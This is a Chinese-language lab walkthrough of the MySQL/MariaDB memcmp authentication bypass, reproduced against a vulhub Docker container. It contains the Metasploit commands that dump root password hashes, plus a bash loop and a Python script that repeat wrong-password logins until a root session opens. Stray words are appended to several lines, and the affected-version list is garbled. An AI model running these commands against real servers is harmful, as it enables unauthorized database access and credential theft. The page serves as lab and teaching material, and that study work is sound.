当链接MariaDB/MySQL时,输入的密码会与指望的正确密码比较,因为不正确的处理,会致使即使是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。
这个缺陷的根源在于memcmp()函数老是返回-128到127(有符号字符)范围内的值。也就是说,只有在Linux系统使用SSE优化库(GNU C库)的场合下才能被利用,成功触发这一漏洞的几率约为1:256。
受影响版本:
MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not.
MySQL versions from 5.1.63, 5.5.24, 5.6.6 are not.html
环境使用vulhub搭建好的docker
配置:mysql(版本:5.5.23) 帐号密码:root/123456python
metasploitmysql
msf > use auxiliary/scanner/mysql/mysql_authbypass_hashdump
msf auxiliary(scanner/mysql/mysql_authbypass_hashdump) > set USERNAME root
USERNAME => root
msf auxiliary(scanner/mysql/mysql_authbypass_hashdump) > set RHOSTS 192.168.31.23
RHOSTS => 192.168.31.23
msf auxiliary(scanner/mysql/mysql_authbypass_hashdump) > run
[+] 192.168.31.23:3306 - 192.168.31.23:3306 The server allows logins, proceeding with bypass test
[+] 192.168.31.23:3306 - 192.168.31.23:3306 Successfully bypassed authentication after 64 attempts. URI: mysql://root:ZoSnI@192.168.31.23:3306
[+] 192.168.31.23:3306 - 192.168.31.23:3306 Successfully exploited the authentication bypass flaw, dumping hashes...
[+] 192.168.31.23:3306 - 192.168.31.23:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
[+] 192.168.31.23:3306 - 192.168.31.23:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
[+] 192.168.31.23:3306 - 192.168.31.23:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
[+] 192.168.31.23:3306 - 192.168.31.23:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
[+] 192.168.31.23:3306 - 192.168.31.23:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
[+] 192.168.31.23:3306 - 192.168.31.23:3306 Hash Table has been saved: /root/.msf4/loot/20190714220813_default_192.168.31.23_mysql.hashes_963184.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
bash
for i inseq 1 1000; do mysql -u root --password=bad -h IP 2>/dev/null; doneweb
root@kali:~# for i in `seq 1 1000`; do mysql -u root --password=bad -h 192.168.31.23 2>/dev/null; done Welcome to the MariaDB monitor. Commands end with ; or \g. Your MySQL connection id is 6065 Server version: 5.5.23 Source distribution Copyright (c) 2000, 2017, Oracle, MariaDB Corporation Ab and others. Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. MySQL [(none)]> show databases; +--------------------+ | Database | +--------------------+ | information_schema | | mysql | | performance_schema | | test | +--------------------+ 4 rows in set (0.00 sec) MySQL [(none)]>
python
代码sql
#a.py
#!/usr/bin/python
import subprocess
while 1:
subprocess.Popen("mysql -u root mysql -h IP --password=baah", shell=True).wait()
结果显示docker
root@kali:~# python a.py ERROR 1045 (28000): Access denied for user 'root'@'192.168.31.22' (using password: YES) ERROR 1045 (28000): Access denied for user 'root'@'192.168.31.22' (using password: YES) ERROR 1045 (28000): Access denied for user 'root'@'192.168.31.22' (using password: YES) ERROR 1045 (28000): Access denied for user 'root'@'192.168.31.22' (using password: YES) ERROR 1045 (28000): Access denied for user 'root'@'192.168.31.22' (using password: YES) ERROR 1045 (28000): Access denied for user 'root'@'192.168.31.22' (using password: YES) ...... ERROR 1045 (28000): Access denied for user 'root'@'192.168.31.22' (using password: YES) ERROR 1045 (28000): Access denied for user 'root'@'192.168.31.22' (using password: YES) ERROR 1045 (28000): Access denied for user 'root'@'192.168.31.22' (using password: YES) Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A Welcome to the MariaDB monitor. Commands end with ; or \g. Your MySQL connection id is 8064 Server version: 5.5.23 Source distribution Copyright (c) 2000, 2017, Oracle, MariaDB Corporation Ab and others. Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. MySQL [mysql]>
参考文章:
https://www.freebuf.com/vuls/3815.html
https://www.jianshu.com/p/909bfe51c468shell